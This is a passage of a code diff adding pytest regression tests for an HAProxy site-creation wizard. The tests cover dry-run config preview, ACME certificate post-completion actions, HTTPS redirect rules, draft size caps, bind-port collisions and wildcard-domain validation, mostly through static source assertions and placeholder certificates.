"Phase K Phase C regression: ACME mode synthesizer is now "
"emitting `ssl crt …` for an HTTPS frontend that does not "
"exist yet — this would surface a false positive error in "
"the dry-run gate when the operator is on Step 4 with a "
"valid ACME draft."
)
upload_payload = _site_payload(
ssl={
"mode": "upload",
"name": "test-cert",
"certificate_content": "-----BEGIN CERTIFICATE-----\nfake\n-----END CERTIFICATE-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----\nfake\n-----END PRIVATE KEY-----",
},
)
upload_fragment = _build_candidate_fragment(upload_payload)
assert "ssl crt" in upload_fragment, (
"Phase K Phase C regression: upload mode no longer renders "
"a `bind … ssl crt …` directive — the dry-run would miss "
"every TLS-bind related error class."
)
def test_phase_k_preview_dry_run_query_param_is_optional():
"""Phase K Phase C — the `validate_haproxy_config` flag must be
OPTIONAL on `POST /api/sites/preview` (default false). Existing
callers (e.g. `SiteDrafts.handlePreview`) pass no flag and
must keep their existing behaviour. Static-source pin.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
assert "validate_haproxy_config: bool = False" in body, (
"Phase K Phase C regression: the preview endpoint no "
"longer accepts `validate_haproxy_config` as an OPTIONAL "
"flag (default False). A non-default would break legacy "
"callers that never pass it."
)
def test_phase_k_preview_dry_run_validator_crash_is_non_fatal():
"""Phase K Phase C — when the validator itself raises, the
preview must return a `validation` block with `is_valid: null`
+ `validator_error`. HTTP status stays 200. Mirrors the
existing create_site contract at
`routers/site_wizard.py:1118-1124` (validator-crash-is-non-fatal).
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
# The crash branch must (a) emit a logger.warning, (b) wrap the
# response with is_valid=None, (c) NEVER raise an HTTPException.
assert '"is_valid": None' in body, (
"Phase K Phase C regression: the dry-run validator-crash "
"branch no longer returns `is_valid: None`. The frontend "
"uses None as a tri-state to render the `unavailable` UX "
"(orange 'validation could not be performed' Alert)."
)
assert "validator_error" in body, (
"Phase K Phase C regression: the dry-run validator-crash "
"branch no longer surfaces `validator_error` to the "
"operator — without it operators cannot tell why the "
"validation became unavailable."
)
def test_phase_k_preview_dry_run_rate_limit_only_on_dry_run_path():
"""Phase K Phase C — `_enforce_rate_limit` must run ONLY when
`validate_haproxy_config=true`. Legacy preview callers
(`SiteDrafts.handlePreview`) keep their unrestricted budget.
Static-source pin.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
# Find the preview_create function body — Header(None) has nested
# parens in the signature so we anchor on the def line and the
# next `async def `/`def `/`@router.` instead of a parenthesised
# signature regex.
start = body.find("async def preview_create(")
assert start >= 0, "preview_create function not found"
# End at the next top-level def or router decorator after `start`.
next_async = body.find("\nasync def ", start + 1)
next_def = body.find("\ndef ", start + 1)
next_router = body.find("\n@router.", start + 1)
candidates = [x for x in (next_async, next_def, next_router) if x >= 0]
end = min(candidates) if candidates else len(body)
fn_body = body[start:end]
assert "if validate_haproxy_config:" in fn_body, (
"Phase K Phase C regression: the rate-limit path is no "
"longer gated by the dry-run flag — every legacy preview "
"caller would be rate-limited too, breaking SiteDrafts."
)
assert '_enforce_rate_limit(conn, current_user["id"], "site_previewed")' in fn_body, (
"Phase K Phase C regression: the dry-run preview path no "
"longer rate-limits at 5/min. The Step 4 auto-fire could "
"spam the validator on every keystroke if the wizard's "
"invalidate-on-change effect ever loops."
)
def test_phase_k_preview_dry_run_returns_severity_buckets():
"""Phase K Phase C — the dry-run path must bucket validator
results by severity (errors / warnings / infos). Static-source
pin on the `validation` envelope shape.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
for key in ('"errors"', '"warnings"', '"infos"', '"is_valid"',
'"error_count"', '"warning_count"'):
assert key in body, (
f"Phase K Phase C regression: the dry-run `validation` "
f"envelope no longer surfaces {key} — the wizard "
"frontend's severity-aware UI relies on this exact "
"shape to render the green / yellow / red Alerts."
)
def test_phase_k_preview_dry_run_does_not_persist_via_helper():
"""Phase K Phase C — `_synthesize_candidate_haproxy_config`
only calls the read-only `generate_haproxy_config_for_cluster`
plus a pure-string `_build_candidate_fragment`. Static-source
pin guards against a refactor that calls a `create_*_row`
helper from inside the preview branch.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
start = body.find("async def _synthesize_candidate_haproxy_config(")
assert start >= 0, "_synthesize_candidate_haproxy_config function body not found"
next_async = body.find("\nasync def ", start + 1)
next_def = body.find("\ndef ", start + 1)
next_router = body.find("\n@router.", start + 1)
candidates = [x for x in (next_async, next_def, next_router) if x >= 0]
end = min(candidates) if candidates else len(body)
fn_body = body[start:end]
for forbidden in (
"create_backend_row(",
"create_server_row(",
"create_frontend_row(",
"create_cert_row(",
):
assert forbidden not in fn_body, (
"Phase K Phase C regression: the synthesizer now "
f"calls `{forbidden}…` — the dry-run helper must "
"stay write-free; persistence belongs in `create_site`."
)
def test_phase_k_preview_dry_run_telemetry_emits_log_lines():
"""Phase K Phase C — each dry-run must emit two structured log
lines (ENTER + EXIT) so operators can correlate "Create button
is disabled" with backend telemetry. Static-source pin.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
body = src.read_text()
assert "WIZARD: dry-run /preview ENTER" in body, (
"Phase K Phase C regression: the dry-run ENTER log line is "
"no longer emitted. Operators debugging \"why is Create "
"disabled\" rely on this line to confirm the request "
"reached the backend."
)
assert "WIZARD: dry-run /preview EXIT" in body, (
"Phase K Phase C regression: the dry-run EXIT log line is "
"no longer emitted with error_count / warning_count / "
"duration_ms. Operators rely on this to correlate slow "
"validations with cluster-side issues."
)
def test_phase_k_phase_d_sitedrafts_renders_cluster_name_not_raw_id():
"""Phase K Phase D follow-up (operator feedback, round 4) —
the Site Drafts table previously rendered the raw `cluster_id`
integer in its "Cluster" column. Operators think in cluster
names, not surrogate keys: "1" or "2" is meaningless without a
legend mapping. The page now consumes `useCluster()` and renders
the cluster's `name`, falling back to a `#id` tag with an
explanatory tooltip when the cluster is missing from the
context (deleted / list still loading).
Static-source pin so a future refactor that switches back to
`String(cid)` is caught immediately. Pin is skipped in the
backend-only build container where `frontend/` is not shipped
(matches the convention used by sibling tests, see e.g.
`test_site_wizard_form.py`).
"""
from pathlib import Path
src = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteDrafts.js"
)
if not src.exists():
pytest.skip(
f"frontend not present at {src}; running in backend-only "
"container is expected — skip JS source pin"
)
body = src.read_text()
# The drafts page must import `useCluster` so the column renderer
# has a cluster list to resolve names against.
assert "useCluster" in body, (
"SiteDrafts must import `useCluster` to translate cluster_id "
"values into cluster names."
)
# The helper that translates id → display label must exist and
# be reused by both the table column AND the preview modal so the
# two stay in sync.
assert "renderClusterLabel" in body, (
"SiteDrafts must define a `renderClusterLabel` helper that "
"maps cluster_id → cluster.name (with id fallback) and is "
"shared by the table column and the Preview modal."
)
# The previous broken rendering branch must be gone.
assert "String(cid)" not in body, (
"SiteDrafts regression: the Cluster column is back to "
"rendering the raw `String(cid)` integer. Use "
"`renderClusterLabel(cid)` instead."
)
# The Preview modal's Descriptions item must use the new helper
# and the human-friendly label, not "Cluster ID".
assert 'label="Cluster ID"' not in body, (
"SiteDrafts Preview modal regression: the cluster row is "
"back to the operator-hostile `label=\"Cluster ID\"` and "
"raw integer rendering."
)
@@ -0,0 +1,250 @@
"""
v1.5.0 Feature B — _execute_post_completion_actions unit tests.
Coverage targets the high-risk gates that survived the multi-round audit:
* idempotency (M2/M3): an action with executed_at must be skipped silently
* port-collision pre-check (M21/R35): pre-INSERT collision check rejects
cleanly without writing
* non-dict / unknown-type actions are skipped (defensive parsing)
* renewal of a cert whose order has post_completion_actions DOES NOT
re-execute them (handled in _complete_certificate's caller path: the
is_renewal flag gates the call; we cover that contract here)
"""
import json
from contextlib import asynccontextmanager
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
# ----------------------------------------------------------------------------
# Test helpers
# ----------------------------------------------------------------------------
@asynccontextmanager
async def _fake_tx():
"""Stand-in for conn.transaction() async context manager."""
yield
def _make_conn():
conn = AsyncMock()
conn.transaction = MagicMock(side_effect=lambda: _fake_tx())
return conn
# ----------------------------------------------------------------------------
# Idempotency
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_already_executed_action_is_skipped():
from routers.letsencrypt import _execute_post_completion_actions
conn = _make_conn()
actions = [{
"type": "create_frontend",
"executed_at": "2026-05-01T00:00:00Z", # already done
"frontend_config": {"cluster_id": 1, "name": "fe-https"},
}]
outcomes = await _execute_post_completion_actions(
conn, order_id=1, actions=actions, cert_id=42,
)
assert len(outcomes) == 1
assert outcomes[0]["status"] == "skipped"
assert "already executed" in outcomes[0]["reason"]
@pytest.mark.asyncio
async def test_non_dict_action_is_skipped():
from routers.letsencrypt import _execute_post_completion_actions
conn = _make_conn()
outcomes = await _execute_post_completion_actions(
conn, order_id=1, actions=["not a dict", 42, None], cert_id=42,
)
assert len(outcomes) == 3
assert all(o["status"] == "skipped" for o in outcomes)
# ----------------------------------------------------------------------------
# Port-collision pre-check (M21/R35)
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_port_collision_skips_create_and_records_event():
"""If the bind port is taken at the moment of post-completion, we must
NEVER attempt the INSERT — that would orphan the cert.
"""
from routers.letsencrypt import _execute_post_completion_actions
conn = _make_conn()
actions = [{
"type": "create_frontend",
"frontend_config": {
"cluster_id": 1,
"bind_address": "*",
"bind_port": 443,
"name": "fe-https",
},
}]
record_event_mock = AsyncMock()
with patch(
"services.frontend_service.check_bind_port_collision",
AsyncMock(return_value=99), # collision: existing frontend id 99
), patch(
"services.frontend_service.create_frontend_row",
AsyncMock(),
) as create_fe, patch(
"utils.activity_log.record_event",
record_event_mock,
):
outcomes = await _execute_post_completion_actions(
conn, order_id=1, actions=actions, cert_id=42,
)
create_fe.assert_not_called()
assert outcomes[0]["status"] == "error"
assert outcomes[0]["reason"] == "port_collision"
# An event was recorded for the skip
record_event_mock.assert_awaited()
awaited_args = record_event_mock.await_args.args
awaited_kwargs = record_event_mock.await_args.kwargs
# First positional is order_id, second is event_type
assert awaited_args[0] == 1
assert "skipped" in awaited_args[1]
# ----------------------------------------------------------------------------
# Unknown action type does not crash the loop
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_unknown_action_type_does_not_raise():
from routers.letsencrypt import _execute_post_completion_actions
conn = _make_conn()
# Action with no recognized type — must not crash; outcome flagged.
actions = [{"type": "redact_secrets"}]
outcomes = await _execute_post_completion_actions(
conn, order_id=1, actions=actions, cert_id=42,
)
assert len(outcomes) == 1
# Defensive parsing: at minimum a status is returned per action.
assert "status" in outcomes[0]
# ----------------------------------------------------------------------------
# Contract: renewal does NOT execute post-completion actions
# (the gate lives in _complete_certificate; we assert via grep that
# `is_renewal` guards the actions call)
# ----------------------------------------------------------------------------
def test_complete_certificate_renewal_gate_exists_in_source():
"""The renewal of a cert (where the order is being re-issued via the
auto-renew daemon) MUST NOT trigger post_completion_actions a second
time. The gate is `if not is_renewal:` inside _complete_certificate.
This is a static assertion against the source — refactor that drops the
gate would silently re-create the wizard's HTTPS frontend on every
renewal.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "letsencrypt.py"
text = src.read_text()
assert "is_renewal" in text
# Specifically inside _complete_certificate, post_completion_actions
# is invoked under the `if not is_renewal:` guard.
idx = text.find("_execute_post_completion_actions")
assert idx != -1, "post-completion call must exist in _complete_certificate"
# Look back a few hundred chars for the renewal guard.
window_start = max(0, idx - 800)
surrounding = text[window_start:idx]
assert ("is_renewal" in surrounding or "not is_renewal" in surrounding), (
"_execute_post_completion_actions must be gated by 'is_renewal' to "
"prevent re-running wizard actions on renewal."
)
def test_wizard_order_bypasses_existing_cert_match():
"""Bulgu #4: a wizard-staged order with non-empty post_completion_actions
must NOT be merged into a manually-issued cert that happens to share
the same primary_domain. The is_wizard_order short-circuit forces
existing_cert=None so a fresh cert row is INSERTed and the deferred
HTTPS frontend creation actually fires.
Static source assertion — a refactor that drops `is_wizard_order` would
silently regress wizard host creation when an old manual cert exists.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "letsencrypt.py"
text = src.read_text()
assert "is_wizard_order" in text, (
"_complete_certificate must short-circuit existing_cert lookup "
"when post_completion_actions is non-empty (Bulgu #4)"
)
def test_wizard_uses_consolidated_version_for_acme_gating():
"""Bulgu #30: the staged ACME order's pending_apply_version_name must be
the CONSOLIDATED version name returned by apply_cluster_pending
(`apply-consolidated-{ts}`), NOT the original PENDING version name
(`bulk-proxied-host-create-{ts}`). Agents only ever report the
consolidated name back via /config-applied, so gating on the bulk
name would block wizard order promotion forever.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
text = src.read_text()
assert "gating_version_name" in text, (
"create_proxied_host must derive a gating version name from "
"apply_result.latest_version (Bulgu #30)"
)
# The staged order must be created with gating_version_name, not
# the literal `version_name` (which is the PENDING bulk name).
idx = text.find("create_order_staged(")
assert idx != -1
# Look forward 1000 chars for the pending_apply_version_name= kwarg.
snippet = text[idx:idx + 1500]
assert "pending_apply_version_name=gating_version_name" in snippet, (
"create_order_staged must be called with pending_apply_version_name="
"gating_version_name (Bulgu #30)"
)
def test_main_processes_wizard_staged_orders_unconditionally():
"""Bulgu #2: _process_wizard_staged_orders must run every cycle of
complete_pending_acme_orders, even when no claimed_ids exist. Otherwise
a freshly created wizard order on an idle system would never leave
wizard_staged status.
Static source assertion against main.py: the call to
_process_wizard_staged_orders should NOT sit after the
`if not claimed_ids: continue` early-out.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "main.py"
text = src.read_text()
process_call_idx = text.find("_process_wizard_staged_orders(acme_svc)")
assert process_call_idx != -1, (
"_process_wizard_staged_orders must be invoked from "
"complete_pending_acme_orders"
)
early_continue_idx = text.find("if not claimed_ids:")
assert early_continue_idx != -1
# The wizard processing call must come BEFORE the early-out so the
# idle-system path still drives wizard_staged orders forward.
assert process_call_idx < early_continue_idx, (
"_process_wizard_staged_orders must run BEFORE 'if not claimed_ids: continue' "
"(Bulgu #2: otherwise wizard orders are starved on idle systems)"
)
@@ -0,0 +1,89 @@
"""v1.5.0 R12 — _execute_post_completion_actions advanced field forwarding.
Bulgu #f1 (CRITICAL): the SimpleNamespace shim assembled inside
routers/letsencrypt.py::_execute_post_completion_actions used to forward
only a handful of frontend fields (name, mode, bind_*, default_backend,
acl/redirect/use_backend rules, timeout_*, maxconn, options) — silently
dropping HSTS / ALPN / TLS-version / compression / monitor_uri /
log_separate / rate_limit / request_headers / strict-sni / ciphers /
ciphersuites for ACME-issued HTTPS frontends.
User-visible symptom: "I enabled HSTS in the wizard but the resulting
HTTPS frontend doesn't have it" after the LE order completed.
These tests pin the FULL list of forwarded keys via static source-code
assertions so a future refactor cannot silently regress the bug.
"""
from pathlib import Path
import pytest
SOURCE = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "letsencrypt.py"
).read_text()
# Every key the wizard may store on frontend_config (matches the dict
# built in routers/site_wizard.py::create_proxied_host for ACME mode).
# NOTE: `ssl_enabled` is intentionally NOT in this list — it's hardcoded
# to True at the SimpleNamespace level (post-completion only fires when
# we successfully completed an HTTPS cert), so it does NOT come from
# fe_cfg.get(...).
_REQUIRED_FORWARDED_KEYS = [
# core
"name", "bind_address", "bind_port", "default_backend", "mode",
# routing
"acl_rules", "redirect_rules", "use_backend_rules",
# tcp-mode
"tcp_request_rules",
# timeouts + capacity
"timeout_client", "timeout_http_request", "maxconn", "rate_limit",
# observability + traffic shaping
"compression", "log_separate", "monitor_uri",
# header injection (HSTS lands here)
"request_headers", "response_headers",
# raw HAProxy options
"options",
# advanced TLS — HAProxy 2.4+ bind directives
"ssl_alpn", "ssl_ciphers", "ssl_ciphersuites",
"ssl_min_ver", "ssl_max_ver", "ssl_strict_sni",
]
@pytest.mark.parametrize("key", _REQUIRED_FORWARDED_KEYS)
def test_post_completion_simple_namespace_forwards_key(key):
"""Each of the wizard-managed frontend_config keys must be referenced
by name inside _execute_post_completion_actions's SimpleNamespace
shim. We use a literal substring match (`fe_cfg.get("KEY")` or
`KEY=fe_cfg.get`) — both forms appear in the source — and require
AT LEAST one of them.
"""
fe_cfg_get = f'fe_cfg.get("{key}"'
kwarg_form = f'{key}=fe_cfg.get'
assert fe_cfg_get in SOURCE or kwarg_form in SOURCE, (
f"Bulgu #f1 regression: routers/letsencrypt.py::"
f"_execute_post_completion_actions does not forward "
f"frontend_config.{key} to the create_frontend_row payload. "
f"This silently drops the wizard's user-selected setting for "
f"ACME-issued HTTPS frontends."
)
def test_post_completion_schema_version_2_understood():
"""v1.5.0 R12 bumped schema_version to 2 to mark the action as
carrying the extended TLS/HSTS/header field set. The reader does
not switch on schema_version (forward-compat by reading via
fe_cfg.get with default=None), but we assert the marker is at
least documented in the calling site for future maintainers."""
proxied_host_src = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
assert '"schema_version": 2' in proxied_host_src, (
"Wizard create_proxied_host should set post_completion_action.schema_version=2 "
"when emitting the extended TLS/HSTS field set."
)
+150
View File
@@ -0,0 +1,150 @@
"""
v1.5.0 Feature B — preview helper unit tests.
Validates pure helpers used by the wizard's /preview and /create flows:
* _build_redirect_rules (M19): https_redirect=true expands to a single
canonical scheme-redirect row; explicit redirect_rules pass through.
* preview MUST not write — verified by counting writes against a mock conn.
The preview endpoint itself relies on FastAPI dependency injection and DB
state; those paths are exercised in the Docker compose smoke tests
(t18). This file stays in pure-unit territory consistent with the rest of
the test suite.
"""
from unittest.mock import AsyncMock
import pytest
from models.site_wizard import (
BackendStep,
FrontendStep,
SiteCreate,
ServerStep,
SSLChoice,
)
from routers.site_wizard import _build_redirect_rules
def _payload(**overrides):
base = {
"cluster_id": 1,
"domains": ["www.example.com"],
"backend": {"name": "be"},
"servers": [{
"server_name": "s1",
"server_address": "10.0.0.1",
"server_port": 80,
}],
"frontend": {"name": "fe", "bind_port": 80},
"ssl": {"mode": "none"},
}
base.update(overrides)
return SiteCreate(**base)
# ----------------------------------------------------------------------------
# _build_redirect_rules
# ----------------------------------------------------------------------------
def test_build_redirect_rules_emits_canonical_https_redirect():
"""PR-1 R11.A-1 fix: pre-fix the row carried both ``type='scheme'``
and a URL in ``location`` — but HAProxy ``redirect scheme`` only
accepts a literal scheme name (``http``/``https``). The URL form
of ``location`` is reserved for ``redirect location <URL>``. The
canonical scheme-redirect now emits ``scheme: 'https'`` and
drops the conflicting ``location`` field.
Bulgu #28 (round-12 audit): SiteCreate now rejects
https_redirect=true with ssl.mode='none' (self-bricking
config — redirect points at a port with nothing listening).
The test exercises `_build_redirect_rules` against a payload
that uses ssl.mode='upload' with stub PEMs so the validator
accepts the redirect combination.
"""
p = _payload(
frontend={"name": "fe", "bind_port": 80, "https_redirect": True},
ssl={
"mode": "upload",
"name": "stub-cert",
"certificate_content": (
"-----BEGIN CERTIFICATE-----\nstub\n-----END CERTIFICATE-----"
),
"private_key_content": (
"-----BEGIN PRIVATE KEY-----\nstub\n-----END PRIVATE KEY-----"
),
},
)
rules = _build_redirect_rules(p)
assert len(rules) == 1
rule = rules[0]
assert rule["type"] == "scheme"
assert rule["code"] == 301
# PR-1 fix: scheme name (NOT a URL) — HAProxy `redirect scheme https`
assert rule["scheme"] == "https"
# The URL-bearing 'location' field must NOT be present on a
# type=scheme rule (it is parser-fatal).
assert "location" not in rule, (
"R11.A-1 regression: type=scheme redirect must not carry a "
"'location' URL — HAProxy `redirect scheme` parser rejects it."
)
# Negative ssl_fc condition — only redirect on plain HTTP requests.
assert "!{ ssl_fc }" in rule["condition"]
def test_build_redirect_rules_passes_explicit_rules_through():
explicit = [
{"type": "location", "code": 302, "location": "/new", "condition": ""},
]
p = _payload(frontend={
"name": "fe", "bind_port": 80,
"https_redirect": False,
"redirect_rules": explicit,
})
rules = _build_redirect_rules(p)
assert rules == explicit
def test_build_redirect_rules_empty_when_neither_set():
p = _payload(frontend={"name": "fe", "bind_port": 80})
rules = _build_redirect_rules(p)
assert rules == []
def test_build_redirect_rules_returns_independent_list():
"""Caller must not be able to mutate the model's redirect_rules through
the returned list (defensive copy)."""
explicit = [{"type": "location", "code": 302, "location": "/x", "condition": ""}]
p = _payload(frontend={
"name": "fe", "bind_port": 80,
"https_redirect": False,
"redirect_rules": explicit,
})
out = _build_redirect_rules(p)
out.append({"injected": True})
# The original model must remain unchanged
assert len(p.frontend.redirect_rules) == 1
# ----------------------------------------------------------------------------
# Preview write-safety smoke
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_preview_does_not_invoke_create_helpers():
"""Sanity check: importing the module doesn't trigger create_*_row at
module-load time. The actual /preview endpoint must NEVER invoke any
create helper — those are reserved for the POST endpoint.
"""
import services.backend_service as bs
import services.frontend_service as fs
import services.ssl_service as ss
# Each create helper is an awaitable coroutine function — verify they
# exist (regression guard: refactors that move them must not delete the
# surface used by the wizard).
assert callable(bs.create_backend_row)
assert callable(bs.create_server_row)
assert callable(fs.create_frontend_row)
assert callable(ss.create_cert_row)
@@ -0,0 +1,174 @@
"""v1.5.0 R14 — hardening from the deep-dive audit pass after R13.
Bulgular fixed in this round:
#R14-1 (Major): SiteDraftCreate had `payload: dict` with no
size limit. An authenticated user could POST a 10MB JSON object,
which gets serialised into a JSONB column in wizard_drafts. Multiplied
across users and the 30-day retention window this is a slow-burn DOS
on enterprise storage. Fix: 256KB cap on payload + 50 active drafts
per user cap at the route layer.
#R14-2 (Major): When SSL is enabled the wizard creates BOTH an HTTP
frontend (bind_port) AND an HTTPS frontend (https_bind_port) on the
same agent IPs. If the user mistakenly sets https_bind_port equal to
bind_port, HAProxy refuses to load the config (same address:port
bound twice). Fix: model_validator-level rejection with a clear
error.
These tests are static source assertions plus Pydantic model
exercises so the fix can't silently regress.
"""
import pytest
from pydantic import ValidationError
from models.site_wizard import (
SiteCreate,
SiteDraftCreate,
)
# -------------------- #R14-1: payload size cap --------------------
def test_draft_payload_under_cap_accepted():
"""Normal-sized drafts (~5KB) must continue to work — the cap only
protects against pathological inputs."""
payload = {
"cluster_id": 1,
"domains": ["a.example.com"],
"backend": {"name": "be", "balance_method": "roundrobin", "mode": "http"},
"servers": [{"server_name": "s1", "server_address": "10.0.0.1", "server_port": 8080}],
"frontend": {"name": "fe", "mode": "http", "bind_address": "*", "bind_port": 80},
"ssl": {"mode": "none"},
}
m = SiteDraftCreate(title="t", payload=payload)
assert m.payload == payload
def test_draft_payload_over_256kb_rejected():
"""A draft with a 300KB blob must be rejected at the model layer
BEFORE it ever reaches Postgres."""
big_blob = "x" * (300 * 1024)
with pytest.raises(ValidationError) as exc:
SiteDraftCreate(title="t", payload={"big": big_blob})
msg = str(exc.value)
assert "256KB" in msg or "size limit" in msg, (
"R14-1 regression: oversized drafts must be rejected with a "
"clear, user-actionable message that mentions the cap."
)
def test_draft_route_caps_per_user_drafts():
"""The route layer must enforce a per-user active-drafts cap of 50.
Static source assertion (the route does a COUNT(*) check before
INSERT) — this guards against an accidental refactor that drops
the gate."""
from pathlib import Path
src = (
Path(__file__).resolve().parent.parent
/ "routers"
/ "site_wizard.py"
).read_text()
assert "50 active wizard drafts" in src
assert "COUNT(*)" in src
# Phase I: the cap query was migrated from a single-value
# `wizard_type = 'proxied_host'` filter to a dual-value
# `wizard_type IN ('site', 'proxied_host')` filter so the cap
# still counts pre-rebrand drafts owned by the same user.
# Accept either form so this pin survives the rebrand window.
assert (
"wizard_type IN ('site', 'proxied_host')" in src
or "wizard_type = 'proxied_host'" in src
)
# -------------------- #R14-2: bind_port collision ----------------
def _base_payload():
"""Minimal valid payload that we can override per test."""
return {
"cluster_id": 1,
"domains": ["a.example.com"],
"backend": {"name": "be", "balance_method": "roundrobin", "mode": "http"},
"servers": [
{"server_name": "s1", "server_address": "10.0.0.1", "server_port": 8080}
],
"frontend": {
"name": "fe",
"mode": "http",
"bind_address": "*",
"bind_port": 8080,
},
"ssl": {"mode": "none"},
"apply_immediately": False,
}
def test_https_bind_port_equal_to_http_bind_port_rejected_for_existing():
"""ssl.mode='existing' — same port on both frontends must be rejected."""
p = _base_payload()
p["frontend"]["bind_port"] = 8443
p["ssl"] = {
"mode": "existing",
"ssl_certificate_id": 1,
"https_bind_port": 8443, # same as bind_port → collision
}
with pytest.raises(ValidationError) as exc:
SiteCreate(**p)
msg = str(exc.value)
assert "https_bind_port" in msg
assert "cannot equal" in msg or "different ports" in msg
def test_https_bind_port_equal_to_http_bind_port_rejected_for_upload():
"""ssl.mode='upload' — same port on both frontends must be rejected."""
p = _base_payload()
p["frontend"]["bind_port"] = 8443
p["ssl"] = {
"mode": "upload",
"name": "x",
"certificate_content": "-----BEGIN CERTIFICATE-----\nx\n-----END CERTIFICATE-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----\nx\n-----END PRIVATE KEY-----",
"https_bind_port": 8443,
}
with pytest.raises(ValidationError) as exc:
SiteCreate(**p)
assert "https_bind_port" in str(exc.value)
def test_distinct_bind_ports_pass_for_existing():
"""When the two ports differ the model must accept the payload."""
p = _base_payload()
p["frontend"]["bind_port"] = 80
p["ssl"] = {
"mode": "existing",
"ssl_certificate_id": 1,
"https_bind_port": 443, # different — OK
}
# No raise expected.
SiteCreate(**p)
def test_acme_mode_default_https_port_443_does_not_collide():
"""ssl.mode='acme' forces frontend.bind_port=80 and
https_bind_port defaults to 443 — must not regress into
self-collision."""
p = _base_payload()
p["frontend"]["bind_port"] = 80
p["frontend"]["mode"] = "http"
p["ssl"] = {"mode": "acme"}
p["apply_immediately"] = True
SiteCreate(**p)
def test_ssl_mode_none_does_not_check_port_collision():
"""When SSL is disabled there is no HTTPS frontend, so the
collision check must NOT fire (https_bind_port is irrelevant)."""
p = _base_payload()
p["frontend"]["bind_port"] = 8080
p["ssl"] = {"mode": "none", "https_bind_port": 8080}
# No raise expected.
SiteCreate(**p)
+160
View File
@@ -0,0 +1,160 @@
"""v1.5.0 R16 deep-audit fixes.
#R16-1 (Major): wildcard domain + ssl.mode='acme' rejected upfront.
Pre-R16 the wizard accepted '*.example.com' with ACME mode; LE
refused the order ("wildcard requires DNS-01") and the user only
saw an opaque post-staging error. R16 rejects at the Pydantic
validator with a clear, actionable message.
#R16-2 (Major): ensure_*_table() used to run CREATE INDEX inside the
`if not exists:` block — meaning existing v1.5.0 first-deploy tables
never got the prune-supporting expires_at / created_at indexes. The
daily watermarked retention task fell back to a sequential scan.
R16 hoists the CREATE INDEX IF NOT EXISTS calls OUT of the
if-not-exists guard so they run on every startup.
"""
import pytest
from pydantic import ValidationError
from models.site_wizard import SiteCreate
def _base():
return {
"cluster_id": 1,
"domains": ["example.com"],
"backend": {"name": "be1", "balance_method": "roundrobin", "mode": "http"},
"servers": [
{"server_name": "s1", "server_address": "10.0.0.1", "server_port": 8080}
],
"frontend": {
"name": "fe1",
"mode": "http",
"bind_address": "*",
"bind_port": 80,
},
"ssl": {"mode": "acme"},
"apply_immediately": True,
}
# ---------- #R16-1: wildcard + ACME ---------------
def test_wildcard_domain_rejected_for_acme_mode():
"""*.example.com + ssl.mode='acme' must raise at the Pydantic
layer with a message that mentions 'wildcard' and 'DNS-01'."""
p = _base()
p["domains"] = ["*.example.com"]
with pytest.raises(ValidationError) as exc:
SiteCreate(**p)
msg = str(exc.value)
assert "wildcard" in msg.lower()
assert "DNS-01" in msg
def test_mixed_wildcard_and_normal_domains_rejected_for_acme():
"""A wildcard in a SAN list must also fail (not just first domain)."""
p = _base()
p["domains"] = ["a.example.com", "*.example.com"]
with pytest.raises(ValidationError) as exc:
SiteCreate(**p)
assert "*.example.com" in str(exc.value)
def test_wildcard_allowed_for_upload_and_existing():
"""Wildcards are fine with 'upload' / 'existing' — the user
obtained the cert out-of-band so the WebPKI path is irrelevant."""
# upload
p = _base()
p["domains"] = ["*.example.com"]
p["frontend"]["bind_port"] = 8080
p["ssl"] = {
"mode": "upload",
"name": "wild",
"certificate_content": "-----BEGIN CERTIFICATE-----\nx\n-----END CERTIFICATE-----",
"private_key_content": "-----BEGIN PRIVATE KEY-----\nx\n-----END PRIVATE KEY-----",
"https_bind_port": 8443,
}
p["apply_immediately"] = False
SiteCreate(**p) # no raise
# existing
p2 = _base()
p2["domains"] = ["*.example.com"]
p2["frontend"]["bind_port"] = 8080
p2["ssl"] = {
"mode": "existing",
"ssl_certificate_id": 1,
"https_bind_port": 8443,
}
p2["apply_immediately"] = False
SiteCreate(**p2)
def test_no_wildcard_acme_accepted():
"""Plain a.example.com + acme is the happy path."""
SiteCreate(**_base())
# ---------- #R16-2: index hoist -------------------
def test_acme_event_indexes_hoisted_out_of_if_not_exists():
"""The CREATE INDEX calls for acme_order_events must NOT live
inside the `if not exists:` block — older tables otherwise miss
the indexes and the prune query falls back to a seq scan."""
from pathlib import Path
src = (
Path(__file__).resolve().parent.parent
/ "database"
/ "migrations.py"
).read_text()
# Find the ensure_acme_order_events_table function body.
start = src.find("async def ensure_acme_order_events_table")
end = src.find("async def ensure_wizard_drafts_table", start)
assert start != -1 and end != -1
func_body = src[start:end]
# The R16 guarantee: between `if not exists:` and CREATE INDEX
# there must be a logger.info() call that signals we left the
# if-not-exists block. (We put `logger.info("Created acme_order_events table")`
# INSIDE if-not-exists, then the CREATE INDEX runs UNCONDITIONALLY
# at the same indent as the if-statement.)
idx_line = func_body.find("CREATE INDEX IF NOT EXISTS idx_acme_order_events_order_id")
if_line = func_body.find("if not exists:")
log_line = func_body.find('logger.info("Created acme_order_events table")')
